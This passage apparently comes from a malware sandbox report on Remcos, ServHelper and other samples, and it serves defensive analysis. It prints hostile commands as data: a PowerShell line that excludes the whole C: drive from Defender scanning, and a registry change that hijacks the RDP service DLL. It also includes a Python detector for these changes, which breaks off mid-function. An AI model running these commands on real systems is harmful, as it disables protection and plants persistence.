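Run against the behavioral30 rows this yields two chains (USD $.exe to RegSvcs.exe to Explorer.EXE, and NAPSTAT.EXE to Explorer.EXE) and six findings; against behavioral1 it yields one self-injection finding. Feeding it a full run's SetThreadContext table rather than the excerpt is the intended use.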
Network
Files
memory/2268-0-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-2-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-3-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-4-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-5-0x0000000000470000-0x0000000000512000-memory.dmp
memory/2268-6-0x0000000000400000-0x0000000000430000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
96s
Max time network
144s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe
"C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/1488-2-0x0000000002B80000-0x0000000002B93000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Remcos
Remcos family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\openvpn-gui.job | C:\Windows\SysWOW64\cmd.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\632cfc71bd4734fdd98e48166a52fbc4a48d43640f3375fd882dd374479bffb1.doc" /o ""
C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe
"C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.160:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 160.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.192.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | 193.192.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 2.23.210.149:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 149.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
Files
memory/3076-1-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp
memory/3076-0-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-2-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-5-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-3-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-4-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-9-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-8-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-7-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-6-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-11-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-10-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-12-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-13-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp
memory/3076-14-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-16-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-21-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-23-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-22-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-20-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-19-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-18-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-17-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-15-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp
memory/3076-57-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-61-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-51-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\churner.dll
| MD5 | f7092de5f32c0df837fa7f947a3424af |
| SHA1 | acc8123288c20b1c4ae67ef4f2b4028d9153239c |
| SHA256 | 97adb1700858b74f456f5cf681b0421d0be50e3aed1adea3d1b9694295723700 |
| SHA512 | f10d5c86a85d3d8be56fb5066fddd0474c71a36f280f475f4e3d6cc939718647f493665c4c9ea00c3d60f22f172019e2082c7090b54f730d02701f1cb3d34164 |
memory/3076-75-0x0000014A476C0000-0x0000014A476C4000-memory.dmp
memory/3076-76-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-77-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp
memory/3076-78-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-79-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-80-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | ecc057ec79b066d9736d95015d7797dc |
| SHA1 | 926385ce88d23c5ac765035582388d0f575f1967 |
| SHA256 | 2efed6e1976f9bd3da68b365733f6a9825c86027fe7294b04cda7fb3161eb231 |
| SHA512 | 8eb5977d0b7a5e00549616d12e33851309ff353f837ff17c1cedbff17fb1fa8af18e9bab3a11fd14368263e3e392d126fa5c871b5d493cf8744ddedc2f57044c |
memory/3076-89-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-90-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-91-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe
| MD5 | 87390e37e36622b054d4bdcbb7997b6c |
| SHA1 | 4d591f310318fd95a95109d7965a79729b65c69e |
| SHA256 | 5f067f86ad0f88a629263162810bf5052f5ebbd97d5d0de936311bb44c9f35e7 |
| SHA512 | 285abb19138a5dd109dfc0e76f4a4f96b3731a84ca9229e6ef9315513b052fd7ad7b2e0392ac9becbf4caf2c9bbdbd87f5b66486fb2ae1385c1fbe6e1ed643dd |
C:\Users\Admin\AppData\Local\Adobe\Color\cmpbk32.dll
| MD5 | 67389b7169dbec76a9a11d8570896f4f |
| SHA1 | b9083a4f76911d2ab03b1e3fa2eaa7518e2e8928 |
| SHA256 | d65ea87824e597d3025d6beb12cc3816a98fb34125628120abf7dc3fc73d0e39 |
| SHA512 | 3a095f630d3c68e0af6ae0f4c469db33c90eb537edefd83f1b054241ed43ed2afe1a2c34a693cd81388f8edae693890f2bb6b9b81a1f9adca841eb05b8abb342 |
memory/3004-99-0x00000000015D0000-0x00000000019D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCD41C1.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |
memory/3004-218-0x00000000015D0000-0x00000000019D1000-memory.dmp
memory/4372-219-0x0000000004850000-0x00000000048DA000-memory.dmp
memory/1564-221-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1564-226-0x0000000000400000-0x0000000000478000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
Network
Files
memory/1624-0-0x000000007492E000-0x000000007492F000-memory.dmp
memory/1624-1-0x0000000000260000-0x00000000004A4000-memory.dmp
memory/1624-2-0x0000000074920000-0x000000007500E000-memory.dmp
memory/1624-3-0x000000007492E000-0x000000007492F000-memory.dmp
memory/1624-4-0x0000000074920000-0x000000007500E000-memory.dmp
memory/1624-5-0x0000000007DF0000-0x0000000007FFC000-memory.dmp
memory/1624-6-0x0000000004430000-0x00000000044A0000-memory.dmp
memory/1624-70-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-68-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-66-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-64-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-62-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-60-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-58-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-56-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-54-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-52-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-50-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-48-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-46-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-44-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-42-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-40-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-38-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-36-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-34-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-32-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-30-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-28-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-26-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-24-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-22-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-20-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-18-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-16-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-14-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-12-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-10-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-8-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-7-0x0000000004430000-0x000000000449A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
memory/1624-2032-0x0000000074920000-0x000000007500E000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
130s
Max time network
128s
Command Line
Signatures
ServHelper
Servhelper family
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: Network Share Connection Removal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | C:\Windows\system32\reg.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
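Two of the configuration changes in this section deserve an explicit check rather than a signature name. In behavioral22, reg.exe sets TermService's ServiceDLL to C:\Windows\branding\mediasrv.png (the stock value is %SystemRoot%\System32\termsrv.dll, so this swaps the RDP service implementation for a renamed DLL dropped by powershell.exe) and powershell.exe writes rfxvmt.dll into System32. In behavioral20, powershell.exe runs Set-MpPreference -ExclusionPath with C:\ as the first item, which exempts the whole system volume from Defender scanning, not just the Moupdate.exe path. The Python below is an added example, not the report's or the sandbox's own logic: it parses the rows and command line exactly as printed above and flags each of the three conditions. The trusted-writer list for System32 is the example's own assumption.

```python
import ntpath
import re
from typing import Dict, List

# Rows copied from the behavioral22 signature tables and the behavioral20
# command line above. The checks, the trusted-writer set and the expected
# ServiceDLL value are the added example's own.
SAMPLE_EVENTS = [
    r'| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | C:\Windows\system32\reg.exe | N/A |',
    r"| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |",
    r"| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |",
]
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference '
    r"-ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'"
)

SERVICEDLL_SUFFIX = r"\services\termservice\parameters\servicedll"
EXPECTED_TERMSRV = r"%SystemRoot%\System32\termsrv.dll"
TRUSTED_SYSTEM32_WRITERS = {"trustedinstaller.exe", "msiexec.exe", "tiworker.exe"}  # assumed
EXCLUSION_RE = re.compile(r"Set-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+(.*)", re.I)


def parse_event(row: str) -> Dict[str, str]:
    """Split one '| Description | Indicator | Process | Target |' row into fields."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    return dict(zip(("description", "indicator", "process", "target"), cells))


def check_termservice_dll(events: List[Dict[str, str]]) -> List[str]:
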